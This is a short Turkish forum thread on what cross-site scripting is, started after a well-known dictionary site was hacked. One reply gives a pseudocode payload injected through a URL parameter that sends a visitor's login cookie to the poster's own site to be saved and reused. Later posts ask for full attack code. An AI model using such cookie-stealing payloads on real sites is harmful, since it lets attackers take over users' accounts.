Cross Site Scripting...
-
Ekşi sözlüğün hacklenmesinde kullanılan Cross Site Scripting nedir ne değildir bilgilendirirseniz sevinirim...
-
kısaltımı xss ama cross site scripting css ile karistirilmamasi icin xss kisaltmasini almistir.
url'deki parametreleri programlamanin aciklarini kullanarak elde etme metodudur.
yazılan cesitli makaleler var nette onlari okuyun derim.ayrica
http://sozluk.sourtimes.org/show.asp?t=cross+site+scripting
ornegin show.asp* verilen parametrelerden bi tanesini ["uu" diyelim] sayfanin icine basligin yanina koysaydi, ben (pseudocode yazicam ama) show.asp?t=hede&uu=page.go("http://sitem/cookiekaydet.php?data="+document.cookie) yazip sifreyi alabilirdim. (url oyle verilince basligin hemen yanina page.go(...) yaziliyo, bunu goren browser execute ediyo, edince de sozluk username ve sifrenizin bulundugu cookie'yi url'ye ekliyo. cookiekaydet.php de url'den eklenen kukiyi alip benim diske kaydediyo mesela, ben de sizin cookie'yi kullanarak adiniza girebiliyorum.) -
Removed...
-
XSS konusunda birkac makale yazmıştım , onları netten arayıp bulabilirsiniz.
@doguhan ,
eksisozluk üzerinde XSS'ye açık yer bulamadığın sürece istediğin kadar yedirebileğin eleman olsun farketmez.Cookie çalman için o site üstünden loglaman gerekir.
-
Cross site scriptingi buraya basitçe anlatabilirmisiniz temelini kavramak için
-
ferruh.mavituna.com da çok güzel XSS örnekleri war mantığı kolayca kavrarsınız
-
Removed...
-
[alinti]css diyordun galiba[/alinti]
cross site scripting'in kısaltılmış hali xss'dir.Çünkü css (Cascading Style Sheets) )olarak kullanılır.Karışmaması için xss olarak geçer.
-
Removed...
-
Biri XSS ile nasıl hacklenildiğini tam kodlarıyla ve örnek üstünde döküman haline getirebilir mi?
-
Removed...